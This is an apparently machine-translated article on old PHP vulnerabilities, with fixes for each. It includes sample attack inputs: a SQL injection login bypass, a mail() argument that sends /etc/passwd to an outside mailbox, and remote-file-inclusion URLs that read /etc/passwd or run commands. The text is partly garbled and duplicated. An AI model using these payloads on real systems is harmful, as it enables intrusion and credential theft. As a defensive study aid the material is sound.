Attackers can attack PHP vulnerabilities.

ShaunClowes's article ExploitingCommonVulnerabilitiesinPHPApplications is indeed well written. considering many aspects, I am only a append of a dog, adding some other questions that have not been mentioned. This article focuses on solving problems rather than attacks. 1. the old spoofing SQL statement is in the default mode, even if you forget to copy php. ini

The Shaun Clowes article Exploiting Common Vulnerabilities in PHP Applications is indeed well written. in consideration of many aspects, this article is just a append of a dog, adding some other questions that are not mentioned. This article focuses on solving problems rather than attacks.

 

1. Ancient spoofing SQL statements

 

In the default mode, even if you forget to copy php. ini to/usr/local/lib/php. ini, php still opens magic_quotes_gpc = on. In this way, the single quotation marks ('), double quotation marks ("), backslash (\), and null character NUL (the null byte) of all variables from GET/POST/Cookie) A backslash is added to the database so that the database can be correctly queried. But a configuration file php. ini-optimized was introduced in the php-4-RC2, but the optimized php. ini was magic_quotes_gpc = off. Some network administrators may copy php. ini-optimized to/usr/local/lib/php. ini, which is dangerous. For example, it is relatively simple to verify, assuming that the necessary characters are not filtered:

 

Select * from login where user = '$ HTTP_POST_VARS [user]' and pass = '$ HTTP_POST_VARS [pass]'

 

In the user box and password box, we can enter 1 'or 1 = '1 to pass verification. This is a very antique method, and this statement will be replaced with this:

 

Select * from login where user = '1' or 1 = '1' and pass = '1' or 1 = '1'

 

Because or 1 = '1' was set up, it passed. The best solution is to filter out all unnecessary characters, and we recommend that you add a custom function for the variables from GET/POST/Cookie and used in SQL:

 

Function gpc2sql ($ str ){
If (get_magic_quotes_gpc () = 1)
Return $ str;
Else
Return addslashes ($ str );
}

 

It is mainly for your program to be securely transplanted to various systems.

 

2. the fifth parameter of the mail function

 

In the php-4.0.5, the mail function introduced the fifth parameter to set additional command line parameters when actually sending the mail, but there is no good check for special SHELL command characters, so there is a big problem of executing commands. Just like the example in the manual:

 

Mail ("nobody@aol.com", "the subject", $ message, "From: webmaster @ $ SERVER_NAME", "-fwebmaster @ $ SERVERNAME ");

 

This is problematic, and if $ SERVER_NAME =; mail san@xfocus.org </etc/passwd can send the machine password to my mailbox.
Here, I would like to remind you that there are several examples of security problems in the php Manual. you should not copy them when using them. it just demonstrates the basic functions of the function and you can understand it.

 

For The mail function, we do not need to use the fifth parameter to filter out invalid characters such (;), there is also the php source code package to modify the program ext/standard/mail. c, in if (extra_cmd! = NULL) {add the following line before:

 

Extra_cmd = NULL

 

Then re-compile.

 

3. UNIX edition require and include functions

 

The require and include functions of win versions do not support HTTP and FTP remote file inclusion, while UNIX versions support remote file inclusion by default. Require and include, no matter what extension you use, include you as part of the program for execution.

 

During program writing, many require or include functions are inevitably used for program modularization and program portability, and sometimes variables are used as parameters, such: include ("$ something"); if the user can control the $ something parameter, and this parameter is not filtered, it will be miserable.

 

First, you can view the files that any web user has read permission. assume that this program is called http: // victim/test. php, so we can use the following url: http: // victim/test. php? Something =/etc/passwd to see the/etc/passwd file.

 

In addition, you can execute commands using the functions contained in remote files. For example, if I create a file test. php under www.xfocus.org, the content is: Then I can use the following url:

 

Http: // victim/test. php? Something = http://www.xfocus.org/test.php? Cmd = uname

 

Run any command in this way.

 

PhpMyAdmin also encountered this problem. we can use it to view any files we want to see. However, before the include operation, it first uses the file_exist function to determine whether a file exists. this file_exist function does not support remote files, so the preceding method cannot be used directly. However, we can use apache's log function to request a url with php code. in this way, the log specified as apache by something can also execute commands, but apache logs are usually large, there are too many messy information. Upload to upload the script for local command execution. a file name such as php8Ta02I will be generated in the temporary directory of the server file upload. because the file exists at this time, therefore, you can use the file_exist function to execute the execution script in the uploaded file.

 

Therefore, you must be careful when using the include and require functions, especially when specifying the contained files with parameters. the parameters cannot be controlled by users. You can also remove remote files by modifying the php. ini file to include this function. This was closed in later versions with allow_url_fopen = off before the php-4.0.3 used disable-url-fopen-wrapper.

 

4. disable_function

 

In the php-4.0.1, php. ini introduced a feature called disable_functions, which is useful and can be used to disable some functions. For example, if disable_functions = passthru exec system popen is added to php. ini, the system () has been disabled for security reasons will be prompted when these functions are executed.

 

Alas, but there is no way to execute system commands. Because php uses many perl features, for example, you can use (') to execute the command:

 

$ Output = 'ls-Al ';
Echo"

$output

";
?>

 

This can be avoided only when it is set to safe_mode. However, the hateful safe_mode has too many restrictions, and it is somewhat inconvenient to do other things.

 

5. file upload

 

Php file upload problems in the article.

 

Thanks to the is_uploaded_file and move_uploaded_file functions provided after the php-4.0.3. So the php-4.0.3 above the Upload file program must not use the copy function, instead of move_uploaded_file, it will check whether the file is uploaded. For php-4.0.2 and below, we recommend adding a function before copy:

 

Function is_uploaded_file ($ filename ){
If (! $ Tmp_file = get_cmd_var ('upload _ tmp_dir ')){
$ Tmp_file = dirname (tempnam ('',''));
}
$ Tmp_file. = '/'. basename ($ filename );
/* User might have trailing slash in php. ini ...*/
Return (ereg_replace ('/+', '/', $ tmp_file) ==$ filename );
}

 

This vulnerability has been in the security focus for a long time, but there are a lot of statements to verify and judge before the copy, so it is quite difficult to make the attack.

 

Also, do not use environment variables, Cookie variables, session variables, and so on as conditions for determining the link life and death, because these variables are too easy to be forged.

 

Haha, there are a lot of things at hand, and the others are coming to think about it. you are also welcome to add and modify any other comrades.

 

References
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study In Scarlet-Exploiting Common Vulnerabilities in PHP Applications
(Http://www.securereality.com.au/studyinscarlet.txt) and analysist translation.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
Http://www.securereality.com.au/sradv00008.txt)